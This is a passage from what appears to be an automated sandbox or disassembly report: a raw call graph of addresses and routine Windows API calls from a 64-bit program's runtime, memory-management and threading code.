29302->29303 29304 7ff72f5b2c0b 29303->29304 29305 7ff72f5ac1a0 18 API calls 29304->29305 29306 7ff72f5b2c34 29305->29306 29307 7ff72f5ac1a0 18 API calls 29306->29307 29308 7ff72f5b2c5d 29307->29308 29309 7ff72f5ac1a0 18 API calls 29308->29309 29310 7ff72f5b2c8b 29309->29310 29311 7ff72f5ac1a0 18 API calls 29310->29311 29312 7ff72f5b2cb9 29311->29312 29313 7ff72f5ac1a0 18 API calls 29312->29313 29314 7ff72f5b2ce2 29313->29314 29315 7ff72f5ac1a0 18 API calls 29314->29315 29316 7ff72f5b2d0b 29315->29316 29317 7ff72f5ac1a0 18 API calls 29316->29317 29318 7ff72f5b2d34 29317->29318 29319 7ff72f5ac1a0 18 API calls 29318->29319 29320 7ff72f5b2d5d 29319->29320 29321 7ff72f5ac1a0 18 API calls 29320->29321 29322 7ff72f5b2d86 29321->29322 29323 7ff72f5ac1a0 18 API calls 29322->29323 29324 7ff72f5b2daf 29323->29324 29325 7ff72f5ac1a0 18 API calls 29324->29325 29326 7ff72f5b2dd8 29325->29326 29327 7ff72f5ac1a0 18 API calls 29326->29327 29328 7ff72f5b2e01 29327->29328 29329 7ff72f5ac1a0 18 API calls 29328->29329 29330 7ff72f5b2e2a 29329->29330 29331 7ff72f5ac1a0 18 API calls 29330->29331 29332 7ff72f5b2e53 29331->29332 29333 7ff72f5ac1a0 18 API calls 29332->29333 29334 7ff72f5b2e7c 29333->29334 29335 7ff72f5ac1a0 18 API calls 29334->29335 29336 7ff72f5b2ea5 29335->29336 29337 7ff72f5ac1a0 18 API calls 29336->29337 29338 7ff72f5b2ece 29337->29338 29339 7ff72f5ac1a0 18 API calls 29338->29339 29340 7ff72f5b2ef7 29339->29340 29341 7ff72f5ac1a0 18 API calls 29340->29341 29342 7ff72f5b2f20 29341->29342 29343 7ff72f5ac1a0 18 API calls 29342->29343 29344 7ff72f5b2f49 29343->29344 29345 7ff72f5ac1a0 18 API calls 29344->29345 29346 7ff72f5b2f72 29345->29346 29347 7ff72f5ac1a0 18 API calls 29346->29347 29348 7ff72f5b2f9b 29347->29348 29349 7ff72f5ac1a0 18 API calls 29348->29349 29350 7ff72f5b2fc4 29349->29350 29351 7ff72f5ac1a0 18 API calls 29350->29351 29352 7ff72f5b2fed 29351->29352 29353 7ff72f5ac1a0 18 API calls 29352->29353 29354 7ff72f5b3016 29353->29354 29355 7ff72f5ac1a0 18 API calls 29354->29355 29356 7ff72f5b303f 29355->29356 29357 7ff72f5ac1a0 18 API calls 29356->29357 29358 7ff72f5b3068 29357->29358 29359 7ff72f5ac1a0 18 API calls 29358->29359 29360 7ff72f5b3096 29359->29360 29361 7ff72f5ac1a0 18 API calls 29360->29361 29362 7ff72f5b30c4 29361->29362 29363 7ff72f5ac1a0 18 API calls 29362->29363 29364 7ff72f5b30f2 29363->29364 29365 7ff72f5ac1a0 18 API calls 29364->29365 29366 7ff72f5b3120 29365->29366 29367 7ff72f5ac1a0 18 API calls 29366->29367 29368 7ff72f5b314e 29367->29368 29369 7ff72f5ac1a0 18 API calls 29368->29369 29370 7ff72f5b317c 29369->29370 29371 7ff72f5ac1a0 18 API calls 29370->29371 29372 7ff72f5b31a5 29371->29372 29373 7ff72f5ac1a0 18 API calls 29372->29373 29374 7ff72f5b31d3 29373->29374 29375 7ff72f5ac1a0 18 API calls 29374->29375 29376 7ff72f5b31fc 29375->29376 29377 7ff72f5ac1a0 18 API calls 29376->29377 29378 7ff72f5b3225 29377->29378 29379 7ff72f5ac1a0 18 API calls 29378->29379 29380 7ff72f5ab845 29379->29380 29381 7ff72f5b1460 GetSystemInfo 29380->29381 29382 7ff72f5b14a4 29381->29382 29383 7ff72f5b14a8 GetNumaHighestNodeNumber 29382->29383 29384 7ff72f5b14ce GetCurrentProcess GetProcessGroupAffinity 29382->29384 29383->29384 29385 7ff72f5b14b7 29383->29385 29386 7ff72f5b14f9 GetLastError 29384->29386 29387 7ff72f5b1504 29384->29387 29385->29384 29386->29387 29388 7ff72f5b1526 29387->29388 29420 7ff72f5b1240 GetLogicalProcessorInformationEx GetLastError GetLogicalProcessorInformationEx 29387->29420 29390 7ff72f5b1590 GetCurrentProcess GetProcessAffinityMask 29388->29390 29391 7ff72f5ab84a 29388->29391 29390->29391 29391->29189 29391->29194 29393 7ff72f5ac0f4 29392->29393 29394 7ff72f5ac0f8 29393->29394 29395 7ff72f5aced0 8 API calls 29393->29395 29394->29248 29396 7ff72f5ac124 29395->29396 29396->29248 29398 7ff72f5ac2df 29397->29398 29399 7ff72f5ac1ca 29397->29399 29402 7ff72f5aced0 8 API calls 29398->29402 29400 7ff72f5ac1ef 29399->29400 29401 7ff72f5ac1d7 strcmp 29399->29401 29404 7ff72f5ac20f 29400->29404 29405 7ff72f5ac1fc strcmp 29400->29405 29401->29400 29408 7ff72f5ac1e7 29401->29408 29403 7ff72f5ac2f6 29402->29403 29403->29408 29419 7ff72f5ad050 _stricmp strtoull 29403->29419 29406 7ff72f5ac22f 29404->29406 29407 7ff72f5ac21c strcmp 29404->29407 29405->29404 29405->29408 29409 7ff72f5ac24f 29406->29409 29410 7ff72f5ac23c strcmp 29406->29410 29407->29406 29407->29408 29408->29273 29412 7ff72f5ac273 29409->29412 29413 7ff72f5ac25c strcmp 29409->29413 29410->29408 29410->29409 29414 7ff72f5ac280 strcmp 29412->29414 29415 7ff72f5ac297 29412->29415 29413->29408 29413->29412 29414->29408 29414->29415 29416 7ff72f5ac2a4 strcmp 29415->29416 29417 7ff72f5ac2bb 29415->29417 29416->29408 29416->29417 29417->29398 29418 7ff72f5ac2c8 strcmp 29417->29418 29418->29398 29418->29408 29419->29408 29420->29388 29425 7ff72f60b610 29421->29425 29424 7ff72f5b0860 InitializeCriticalSectionEx 29424->29206 29426 7ff72f60b62a malloc 29425->29426 29427 7ff72f5a5ae5 29426->29427 29428 7ff72f60b61b 29426->29428 29427->29204 29427->29424 29428->29426 29429 7ff72f60b63a 29428->29429 29430 7ff72f60b645 29429->29430 29434 7ff72f60b924 RtlPcToFileHeader RaiseException 29429->29434 29435 7ff72f60b944 RtlPcToFileHeader RaiseException 29430->29435 29433 7ff72f60b64b 29435->29433 29436->29217 29474 7ff72f5b3d70 29437->29474 29439 7ff72f5ac44b 29439->29232 29440 7ff72f5b9340 29439->29440 29483 7ff72f5b0130 29440->29483 29444 7ff72f5b935a 29447 7ff72f5b93fc 29444->29447 29490 7ff72f5b1010 29444->29490 29446 7ff72f5b9442 29446->29233 29447->29446 29448 7ff72f5b94e9 29447->29448 29528 7ff72f5b1200 9 API calls 29447->29528 29459 7ff72f5b9598 29448->29459 29504 7ff72f5d1560 29448->29504 29450 7ff72f5b9527 29450->29448 29529 7ff72f5b1200 9 API calls 29450->29529 29453 7ff72f5b9634 29454 7ff72f60ac48 3 API calls 29453->29454 29453->29459 29455 7ff72f5b969a 29454->29455 29455->29459 29530 7ff72f5b0c50 29455->29530 29457 7ff72f5b96bd 29457->29459 29535 7ff72f5cfdd0 16 API calls 29457->29535 29459->29233 29461 7ff72f5a5732 29460->29461 29462 7ff72f5a576d 29461->29462 29646 7ff72f5b0700 CreateEventW 29461->29646 29462->29235 29464 7ff72f5a5744 29464->29462 29647 7ff72f5aba80 CreateThread 29464->29647 29466 7ff72f5a5763 29466->29235 29468 7ff72f5adb07 29467->29468 29469 7ff72f5adb0f 29468->29469 29470 7ff72f60ac48 3 API calls 29468->29470 29469->29236 29472 7ff72f5adb41 29470->29472 29473 7ff72f5adbd5 29472->29473 29650 7ff72f5b41d0 29472->29650 29473->29236 29479 7ff72f5b4aa0 29474->29479 29477 7ff72f5b3daf 29477->29439 29480 7ff72f60ac48 3 API calls 29479->29480 29481 7ff72f5b3d98 29480->29481 29481->29477 29482 7ff72f5b65d0 malloc RtlPcToFileHeader RaiseException 29481->29482 29482->29477 29484 7ff72f5b01dc 29483->29484 29486 7ff72f5b016b 29483->29486 29489 7ff72f5b1650 QueryPerformanceFrequency 29484->29489 29486->29484 29488 7ff72f5b01a4 29486->29488 29536 7ff72f5afe50 GetCurrentThreadId malloc RtlPcToFileHeader RaiseException 29486->29536 29488->29484 29537 7ff72f5b01f0 malloc RtlPcToFileHeader RaiseException 29488->29537 29489->29444 29491 7ff72f5b1045 29490->29491 29492 7ff72f5b1048 GetCurrentProcess IsProcessInJob 29490->29492 29491->29492 29493 7ff72f5b1120 29492->29493 29494 7ff72f5b1079 29492->29494 29496 7ff72f5b1130 GlobalMemoryStatusEx 29493->29496 29497 7ff72f5b1159 29493->29497 29494->29493 29495 7ff72f5b1083 QueryInformationJobObject 29494->29495 29495->29493 29501 7ff72f5b10a5 29495->29501 29496->29497 29498 7ff72f5b1179 GlobalMemoryStatusEx 29497->29498 29500 7ff72f5b116c 29497->29500 29498->29500 29499 7ff72f5b10e9 GlobalMemoryStatusEx 29499->29493 29538 7ff72f60acf0 8 API calls 29500->29538 29501->29493 29501->29499 29503 7ff72f5b11bb 29503->29447 29505 7ff72f5d157d 29504->29505 29539 7ff72f5b16a0 VirtualAlloc 29505->29539 29507 7ff72f5d15f6 29542 7ff72f5b1440 InitializeCriticalSection 29507->29542 29508 7ff72f5d15a3 29508->29507 29616 7ff72f5b1440 InitializeCriticalSection 29508->29616 29511 7ff72f5d1602 29512 7ff72f5d1a28 29511->29512 29543 7ff72f5e2260 29511->29543 29512->29453 29514 7ff72f5d186f 29514->29453 29515 7ff72f5d1631 29515->29514 29553 7ff72f5d1260 29515->29553 29517 7ff72f5d1804 29557 7ff72f5b17b0 29517->29557 29519 7ff72f5d183e 29519->29514 29560 7ff72f5d1a50 29519->29560 29521 7ff72f5d1860 29522 7ff72f5d1864 29521->29522 29524 7ff72f5d1893 29521->29524 29617 7ff72f5b1790 VirtualFree 29522->29617 29524->29514 29578 7ff72f5e4e60 29524->29578 29528->29450 29529->29448 29531 7ff72f60ac48 3 API calls 29530->29531 29532 7ff72f5b0c76 29531->29532 29533 7ff72f5b0c7e CreateEventW 29532->29533 29534 7ff72f5b0ca0 29532->29534 29533->29534 29534->29457 29535->29459 29536->29488 29537->29484 29538->29503 29540 7ff72f5b16c1 VirtualFree 29539->29540 29541 7ff72f5b16d9 29539->29541 29540->29508 29541->29508 29542->29511 29544 7ff72f5e228f 29543->29544 29545 7ff72f5e22b2 29544->29545 29546 7ff72f5e22bc 29544->29546 29551 7ff72f5e22e7 29544->29551 29618 7ff72f5b1830 18 API calls 29545->29618 29548 7ff72f5b17b0 3 API calls 29546->29548 29550 7ff72f5e22cd 29548->29550 29549 7ff72f5e22ba 29549->29550 29550->29551 29619 7ff72f5b1790 VirtualFree 29550->29619 29551->29515 29555 7ff72f5d127f 29553->29555 29556 7ff72f5d129c 29555->29556 29620 7ff72f5b0d10 GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 29555->29620 29556->29517 29558 7ff72f5b17d5 VirtualAlloc 29557->29558 29559 7ff72f5b17f4 GetCurrentProcess VirtualAllocExNuma 29557->29559 29558->29559 29559->29519 29561 7ff72f5d1a85 29560->29561 29562 7ff72f5d1aa3 29561->29562 29563 7ff72f5d1a89 29561->29563 29566 7ff72f5d1ae3 EnterCriticalSection 29562->29566 29567 7ff72f5d1b61 29562->29567 29568 7ff72f5d1b10 LeaveCriticalSection 29562->29568 29571 7ff72f5d1c19 LeaveCriticalSection 29562->29571 29572 7ff72f5d1bef 29562->29572 29622 7ff72f5b16e0 29562->29622 29621 7ff72f60acf0 8 API calls 29563->29621 29565 7ff72f5d1a9b 29565->29521 29566->29562 29566->29568 29625 7ff72f60acf0 8 API calls 29567->29625 29568->29562 29575 7ff72f5d1c25 29571->29575 29574 7ff72f5d1bf8 EnterCriticalSection 29572->29574 29572->29575 29573 7ff72f5d1be7 29573->29521 29574->29571 29575->29567 29577 7ff72f5d1c5d EnterCriticalSection LeaveCriticalSection 29575->29577 29626 7ff72f5b1770 VirtualFree 29575->29626 29577->29575 29627 7ff72f5e4da0 29578->29627 29581 7ff72f5d0c50 29584 7ff72f5d0c75 29581->29584 29582 7ff72f5d1225 29643 7ff72f5b0bb0 CloseHandle 29582->29643 29583 7ff72f5d1231 29586 7ff72f5d1246 29583->29586 29587 7ff72f5d123a 29583->29587 29589 7ff72f5b0c50 4 API calls 29584->29589 29614 7ff72f5d0cdb 29584->29614 29586->29514 29644 7ff72f5b0bb0 CloseHandle 29587->29644 29590 7ff72f5d0d1b 29589->29590 29591 7ff72f5b0c50 4 API calls 29590->29591 29590->29614 29592 7ff72f5d0d31 29591->29592 29592->29614 29631 7ff72f5b0e30 29592->29631 29594 7ff72f5d1050 29595 7ff72f5b0c50 4 API calls 29594->29595 29596 7ff72f5d10cd 29595->29596 29597 7ff72f5d110f 29596->29597 29598 7ff72f5b0c50 4 API calls 29596->29598 29599 7ff72f5d11d1 29597->29599 29600 7ff72f5d11dd 29597->29600 29597->29614 29601 7ff72f5d10e3 29598->29601 29639 7ff72f5b0bb0 CloseHandle 29599->29639 29603 7ff72f5d11e6 29600->29603 29604 7ff72f5d11f2 29600->29604 29601->29597 29638 7ff72f5b0bd0 CreateEventW malloc RtlPcToFileHeader RaiseException 29601->29638 29640 7ff72f5b0bb0 CloseHandle 29603->29640 29606 7ff72f5d11fb 29604->29606 29607 7ff72f5d1207 29604->29607 29641 7ff72f5b0bb0 CloseHandle 29606->29641 29608 7ff72f5d1210 29607->29608 29607->29614 29642 7ff72f5b0bb0 CloseHandle 29608->29642 29612 7ff72f5d10f9 29612->29597 29613 7ff72f5b0c50 4 API calls 29612->29613 29613->29597 29614->29582 29614->29583 29615 7ff72f5d11ae 29614->29615 29615->29514 29616->29507 29617->29514 29618->29549 29619->29551 29620->29556 29621->29565 29623 7ff72f5b171e GetCurrentProcess VirtualAllocExNuma 29622->29623 29624 7ff72f5b16fb VirtualAlloc 29622->29624 29623->29562 29624->29562 29625->29573 29626->29575 29628 7ff72f5e4db9 29627->29628 29630 7ff72f5d1a07 29627->29630 29629 7ff72f5e4dd0 GetEnabledXStateFeatures 29628->29629 29628->29630 29629->29630 29630->29581 29632 7ff72f5b0f1f GlobalMemoryStatusEx 29631->29632 29633 7ff72f5b0e67 GetCurrentProcess 29631->29633 29636 7ff72f5b0e88 29632->29636 29634 7ff72f5b0e80 29633->29634 29634->29632 29634->29636 29645 7ff72f60acf0 8 API calls 29636->29645 29637 7ff72f5b0ff8 29637->29594 29638->29612 29639->29600 29640->29604 29641->29607 29642->29614 29643->29583 29644->29586 29645->29637 29646->29464 29648 7ff72f5abaaf 29647->29648 29649 7ff72f5abab5 SetThreadPriority ResumeThread CloseHandle 29647->29649 29648->29466 29649->29466 29651 7ff72f5b4203 29650->29651 29655 7ff72f5b4229 29651->29655 29656 7ff72f5b5180 29651->29656 29653 7ff72f5b4220 29654 7ff72f5ac8a0 InitializeCriticalSectionEx 29653->29654 29653->29655 29654->29655 29655->29472 29655->29655 29657 7ff72f5b17b0 3 API calls 29656->29657 29658 7ff72f5b51a2 29657->29658 29659 7ff72f5b51aa 29658->29659 29660 7ff72f5b16e0 3 API calls 29658->29660 29659->29653 29661 7ff72f5b51c8 29660->29661 29664 7ff72f5b51d3 29661->29664 29665 7ff72f5b1790 VirtualFree 29661->29665 29663 7ff72f5b52ee 29663->29653 29664->29653 29665->29663 29666->29241 30394 7ff72f5a3540 6 API calls 29728 7ff72f632f50 29729 7ff72f632f94 29728->29729 29730 7ff72f632fd6 GetCalendarInfoEx 29729->29730 29731 7ff72f632ff5 29730->29731 29733 7ff72f63301d 29731->29733 29734 7ff72f624160 29731->29734 29735 7ff72f62416b 29734->29735 29736 7ff72f6241c6 29734->29736 29735->29736 29737 7ff72f62417b 29735->29737 29738 7ff72f5a1fc0 71 API calls 29736->29738 29739 7ff72f624180 29737->29739 29741 7ff72f624197 29737->29741 29742 7ff72f624213 29737->29742 29740 7ff72f6241f1 29738->29740 29739->29733 29746 7ff72f5a2540 26 API calls 29740->29746 29775 7ff72f5a2080 29741->29775 29764 7ff72f5a1fc0 29742->29764 29745 7ff72f6241a6 29745->29733 29746->29742 29747 7ff72f62421f 29769 7ff72f5a2540 29747->29769 29749 7ff72f62425d 29749->29733 29750 7ff72f624241 29750->29749 29751 7ff72f6243bd 29750->29751 29752 7ff72f624323 29750->29752 29754 7ff72f5a1fc0 71 API calls 29751->29754 29753 7ff72f5a2080 85 API calls 29752->29753 29755 7ff72f624331 29753->29755 29758 7ff72f6243c9 29754->29758 29756 7ff72f624377 MultiByteToWideChar 29755->29756 29757 7ff72f624398 29756->29757 29757->29749 29760 7ff72f5a1fc0 71 API calls 29757->29760 29759 7ff72f5a2540 26 API calls 29758->29759 29759->29757 29761 7ff72f6243f0 29760->29761 29762 7ff72f5a2540 26 API calls 29761->29762 29763 7ff72f62440b 29762->29763 29765 7ff72f5a1ff2 29764->29765 29766 7ff72f5a1feb 29764->29766 29785 7ff72f5ac700 29765->29785 29766->29747 29768 7ff72f5a2044 29768->29747 29770 7ff72f5a25fb 29769->29770 29862 7ff72f653e60 26 API calls 29770->29862 29776 7ff72f5a2089 29775->29776 29779 7ff72f5a20d5 29775->29779 29777 7ff72f5a20c8 29776->29777 29778 7ff72f5ac700 71 API calls 29776->29778 29777->29745 29778->29779 29780 7ff72f5a218c 29779->29780 29781 7ff72f5a2540 26 API calls 29779->29781 29780->29745 29782 7ff72f653d80 29781->29782 29863 7ff72f653f20 26 API calls 29782->29863 29784 7ff72f653e47 29786 7ff72f5ac746 29785->29786 29787 7ff72f5ac786 29786->29787 29790 7ff72f5b759b 29786->29790 29810 7ff72f5b74ab 29786->29810 29787->29768 29791 7ff72f5b75bc 29790->29791 29792 7ff72f5b75ce 29791->29792 29829 7ff72f5c3910 39 API calls 29791->29829 29795 7ff72f5b7625 29792->29795 29796 7ff72f5b75fe GetTickCount64 29792->29796 29804 7ff72f5b76a7 29792->29804 29794 7ff72f5b7637 29818 7ff72f5e2520 29794->29818 29795->29794 29830 7ff72f5c3910 39 API calls 29795->29830 29796->29795 29800 7ff72f5b7612 29796->29800 29800->29804 29801 7ff72f5b76e3 29802 7ff72f5b7570 29801->29802 29803 7ff72f5b74fa 29801->29803 29806 7ff72f5b7709 29801->29806 29828 7ff72f5e25f0 WaitForSingleObject 29802->29828 29803->29787 29804->29802 29831 7ff72f5bd810 59 API calls 29804->29831 29806->29803 29832 7ff72f5ba000 SleepEx SwitchToThread DebugBreak 29806->29832 29807 7ff72f5b7649 29807->29802 29807->29804 29808 7ff72f5b7683 GetTickCount64 29807->29808 29808->29800 29808->29804 29811 7ff72f5b7516 29810->29811 29812 7ff72f5b74ec 29810->29812 29835 7ff72f5bd150 29811->29835 29814 7ff72f5b74f5 DebugBreak 29812->29814 29815 7ff72f5b74fa 29812->29815 29814->29815 29815->29787 29819 7ff72f5e2540 29818->29819 29820 7ff72f5e25da 29818->29820 29821 7ff72f5b0e30 10 API calls 29819->29821 29820->29807 29822 7ff72f5e2567 29821->29822 29823 7ff72f5e25ca 29822->29823 29833 7ff72f5b7060 WaitForSingleObject 29822->29833 29823->29807 29825 7ff72f5e259e 29826 7ff72f5e25b1 29825->29826 29834 7ff72f5cadc0 SleepEx SwitchToThread SwitchToThread 29825->29834 29826->29807 29828->29802 29829->29792 29830->29794 29831->29801 29832->29803 29833->29825 29834->29826 29838 7ff72f5bd182 29835->29838 29839 7ff72f5d6690 GetTickCount64 29838->29839 29841 7ff72f5b7539 29838->29841 29843 7ff72f5e2520 14 API calls 29838->29843 29844 7ff72f5c3910 39 API calls 29838->29844 29846 7ff72f5bde60 29838->29846 29857 7ff72f5e25f0 WaitForSingleObject 29838->29857 29858 7ff72f5cadc0 SleepEx SwitchToThread SwitchToThread 29838->29858 29859 7ff72f5bd810 59 API calls 29838->29859 29839->29838 29841->29815 29845 7ff72f5ba000 SleepEx SwitchToThread DebugBreak 29841->29845 29843->29838 29844->29838 29845->29815 29847 7ff72f5bde9c 29846->29847 29850 7ff72f5bdf48 29846->29850 29848 7ff72f5bdf5a 29847->29848 29849 7ff72f5bdf09 29847->29849 29848->29850 29861 7ff72f5b7060 WaitForSingleObject 29848->29861 29853 7ff72f5bdf18 SwitchToThread 29849->29853 29851 7ff72f5e0720 18 API calls 29850->29851 29856 7ff72f5bdf50 29850->29856 29851->29850 29854 7ff72f5bdf26 29853->29854 29854->29850 29860 7ff72f5cadc0 SleepEx SwitchToThread SwitchToThread 29854->29860 29856->29838 29857->29838 29858->29838 29859->29838 29860->29850 29861->29854 29863->29784 30284 7ff72f5a2450 26 API calls 30356 7ff72f5d6e53 40 API calls 30357 7ff72f5a5650 GetLastError SetLastError RtlRestoreContext 30319 7ff72f5e3f50 9 API calls 30395 7ff72f65ad40 87 API calls 30321 7ff72f5a4720 6 API calls 30286 7ff72f5b6820 SleepEx SwitchToThread 30322 7ff72f5b7f20 GetCurrentThreadId malloc RtlPcToFileHeader RaiseException 30360 7ff72f5b6a20 SleepEx WaitForSingleObject SwitchToThread SwitchToThread SwitchToThread 30396 7ff72f5aa520 9 API calls 30288 7ff72f60ac2c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 29959 7ff72f5e031b 29960 7ff72f5e032c 29959->29960 29961 7ff72f5e035a 29960->29961 29963 7ff72f5b8808 29960->29963 29964 7ff72f5b880d 29963->29964 29981 7ff72f5cad30 29964->29981 29967 7ff72f5b884d 29985 7ff72f5b1630 QueryPerformanceCounter 29967->29985 29970 7ff72f5b886e 29986 7ff72f5ac650 29970->29986 29972 7ff72f5b88be 29973 7ff72f5de8c0 52 API calls 29972->29973 29976 7ff72f5b88c3 29973->29976 29974 7ff72f5b89cd 29975 7ff72f5cad30 SwitchToThread 29974->29975 29977 7ff72f5b8a55 29975->29977 29976->29974 29978 7ff72f5b1630 QueryPerformanceCounter 29976->29978 29979 7ff72f5b1680 SetEvent 29977->29979 29980 7ff72f5b8a78 29977->29980 29978->29974 29979->29980 29980->29961 29982 7ff72f5b882f 29981->29982 29983 7ff72f5cad4f 29981->29983 29982->29967 29990 7ff72f5b1670 ResetEvent 29982->29990 29983->29982 29984 7ff72f5cad91 SwitchToThread 29983->29984 29984->29983 29985->29970 29987 7ff72f5ac65d 29986->29987 29991 7ff72f5a3260 15 API calls 29987->29991 29989 7ff72f5ac6c4 29991->29989 30361 7ff72f5bde1b 23 API calls 30026 7ff72f5cd233 30027 7ff72f5cd23d 30026->30027 30066 7ff72f5c3b10 30027->30066 30029 7ff72f5cd3f2 30034 7ff72f5cd2c9 30029->30034 30101 7ff72f5c6190 10 API calls 30029->30101 30030 7ff72f5cd2bd 30100 7ff72f5b1630 QueryPerformanceCounter 30030->30100 30035 7ff72f5cd675 30034->30035 30036 7ff72f5cd66a 30034->30036 30041 7ff72f5cd673 30034->30041 30035->30041 30103 7ff72f5b1670 ResetEvent 30035->30103 30102 7ff72f5c3910 39 API calls 30036->30102 30041->30041 30070 7ff72f5c7e30 30041->30070 30045 7ff72f5cd909 30052 7ff72f5cd95f 30045->30052 30106 7ff72f5e1200 28 API calls 30045->30106 30047 7ff72f5cd8ff 30050 7ff72f5ac650 15 API calls 30047->30050 30048 7ff72f5cda41 30088 7ff72f5c8830 30048->30088 30050->30045 30051 7ff72f5cdcf1 30055 7ff72f5cdda5 30051->30055 30110 7ff72f5ca330 30051->30110 30052->30048 30052->30051 30107 7ff72f5dd0e0 EnterCriticalSection LeaveCriticalSection 30052->30107 30056 7ff72f5cd883 SwitchToThread 30057 7ff72f5cd74b 30056->30057 30057->30045 30057->30047 30057->30052 30057->30056 30059 7ff72f5cd8af SwitchToThread 30057->30059 30061 7ff72f5cd877 SwitchToThread 30057->30061 30104 7ff72f5b1690 SleepEx 30057->30104 30105 7ff72f5e25f0 WaitForSingleObject 30057->30105 30059->30057 30061->30057 30063 7ff72f5cda4d 30108 7ff72f5b1630 QueryPerformanceCounter 30063->30108 30064 7ff72f5cdbad 30109 7ff72f5c9a50 15 API calls 30064->30109 30067 7ff72f5c3b8b 30066->30067 30068 7ff72f5c3b1d 30066->30068 30067->30029 30067->30030 30068->30067 30069 7ff72f5c3b6e DebugBreak 30068->30069 30069->30068 30071 7ff72f5c7e41 30070->30071 30076 7ff72f5c7f54 30070->30076 30072 7ff72f5b0130 4 API calls 30071->30072 30075 7ff72f5c7e5c 30072->30075 30073 7ff72f5c7eb4 30074 7ff72f5c7f04 30073->30074 30077 7ff72f5b0130 4 API calls 30073->30077 30074->30076 30079 7ff72f5b0130 4 API calls 30074->30079 30075->30073 30078 7ff72f5b0130 4 API calls 30075->30078 30080 7ff72f5e20b0 30076->30080 30077->30073 30078->30075 30079->30074 30082 7ff72f5e20b9 30080->30082 30081 7ff72f5e224d 30081->30057 30082->30081 30083 7ff72f5e2137 DebugBreak 30082->30083 30085 7ff72f5e2146 30082->30085 30083->30085 30084 7ff72f5e21b7 DebugBreak 30087 7ff72f5e21c6 30084->30087 30085->30084 30085->30087 30086 7ff72f5e223a DebugBreak 30086->30081 30087->30081 30087->30086 30089 7ff72f5c885a 30088->30089 30091 7ff72f5c8888 30089->30091 30098 7ff72f5c8a76 30089->30098 30090 7ff72f5c8a71 30131 7ff72f60acf0 8 API calls 30090->30131 30095 7ff72f5c891b 30091->30095 30123 7ff72f5c7a30 30091->30123 30094 7ff72f5c9954 30094->30063 30095->30090 30097 7ff72f5c89e5 EnterCriticalSection LeaveCriticalSection 30095->30097 30130 7ff72f5b1770 VirtualFree 30095->30130 30097->30095 30098->30090 30118 7ff72f5c7be0 30098->30118 30100->30034 30101->30029 30102->30041 30104->30057 30105->30057 30106->30052 30107->30052 30108->30064 30109->30051 30111 7ff72f5ca33f 30110->30111 30112 7ff72f5ca37a 30110->30112 30113 7ff72f5b0130 4 API calls 30111->30113 30142 7ff72f5b6ee0 QueryPerformanceCounter 30112->30142 30113->30112 30115 7ff72f5ca3cb 30143 7ff72f5cc0c0 8 API calls 30115->30143 30117 7ff72f5ca3d0 30117->30055 30119 7ff72f5c7bf4 30118->30119 30120 7ff72f5c7bed 30118->30120 30121 7ff72f5c7c69 30119->30121 30122 7ff72f5c7a30 5 API calls 30119->30122 30120->30090 30121->30090 30122->30119 30132 7ff72f5e2480 30123->30132 30125 7ff72f5c7a69 30126 7ff72f5c7b69 30125->30126 30140 7ff72f5b1770 VirtualFree 30125->30140 30126->30091 30128 7ff72f5c7b2e 30128->30126 30129 7ff72f5c7b3c EnterCriticalSection LeaveCriticalSection 30128->30129 30129->30126 30130->30095 30131->30094 30133 7ff72f5e249a 30132->30133 30135 7ff72f5e24a3 30133->30135 30141 7ff72f5b1770 VirtualFree 30133->30141 30136 7ff72f5e24f3 30135->30136 30137 7ff72f5e24bd EnterCriticalSection 30135->30137 30136->30125 30138 7ff72f5e24e0 30137->30138 30139 7ff72f5e24e7 LeaveCriticalSection 30137->30139 30138->30139 30139->30136 30140->30128 30141->30135 30142->30115 30143->30117 30290 7ff72f5a7430 GetCurrentProcess FlushInstructionCache VirtualProtect 30362 7ff72f5a4230 8 API calls 30397 7ff72f5a3930 17 API calls 30291 7ff72f5b6830 QueryPerformanceCounter 30260 7ff72f65e620 30261 7ff72f5a54e0 16 API calls 30260->30261 30262 7ff72f65e640 30261->30262 30273 7ff72f5a4340 malloc RtlPcToFileHeader RaiseException 30262->30273 30264 7ff72f65e648 30274 7ff72f65e7e0 85 API calls 30264->30274 30266 7ff72f65e666 30275 7ff72f5a20e0 85 API calls 30266->30275 30268 7ff72f65e678 30269 7ff72f65e69b 30268->30269 30276 7ff72f65e990 85 API calls 30268->30276 30277 7ff72f652fa0 85 API calls 30269->30277 30272 7ff72f65e6a8 30273->30264 30274->30266 30275->30268 30276->30268 30277->30272 30365 7ff72f5bab10 DebugBreak DebugBreak 30292 7ff72f5b6910 15 API calls 30293 7ff72f5b7910 SetEvent 30401 7ff72f5a1a08 85 API calls 30402 7ff72f633a00 96 API calls 30295 7ff72f65f100 88 API calls 30331 7ff72f5a53e0 WaitForMultipleObjectsEx SetLastError CoWaitForMultipleHandles SetLastError 30372 7ff72f5b42e0 GetCurrentThreadId SleepEx malloc RtlPcToFileHeader RaiseException 30297 7ff72f5bd8d0 59 API calls 30298 7ff72f5c4cd9 VirtualAlloc VirtualUnlock 29999 7ff72f5d88d9 30002 7ff72f5d88d0 29999->30002 30002->29999 30003 7ff72f5d7c37 30002->30003 30007 7ff72f5bc630 30002->30007 30021 7ff72f5bbff0 13 API calls 30002->30021 30006 7ff72f5cf120 34 API calls 30003->30006 30019 7ff72f5df280 VirtualAlloc VirtualUnlock 30003->30019 30020 7ff72f5cf280 38 API calls 30003->30020 30006->30003 30012 7ff72f5bc65e 30007->30012 30008 7ff72f5bca61 30009 7ff72f5bc9eb 30008->30009 30013 7ff72f5cf900 11 API calls 30008->30013 30014 7ff72f5bcb9c 30008->30014 30024 7ff72f5bb5c0 VirtualAlloc VirtualUnlock 30008->30024 30009->30002 30012->30008 30012->30009 30015 7ff72f5bc9f7 30012->30015 30017 7ff72f5bc96f 30012->30017 30013->30008 30025 7ff72f5bb5c0 VirtualAlloc VirtualUnlock 30014->30025 30023 7ff72f5bb5c0 VirtualAlloc VirtualUnlock 30015->30023 30022 7ff72f5bb5c0 VirtualAlloc VirtualUnlock 30017->30022 30019->30003 30020->30003 30021->30002 30022->30009 30023->30009 30024->30008 30025->30009 30403 7ff72f5bd9ea SleepEx WaitForSingleObject SwitchToThread SwitchToThread 30300 7ff72f5bdf50 45 API calls 30332 7ff72f65fbe0 LocaleNameToLCID 30405 7ff72f5d99c3 52 API calls 29667 7ff72f5bdfbf 29672 7ff72f5e0720 29667->29672 29669 7ff72f5bdf97 29670 7ff72f5e0720 18 API calls 29669->29670 29671 7ff72f5be085 29669->29671 29670->29669 29677 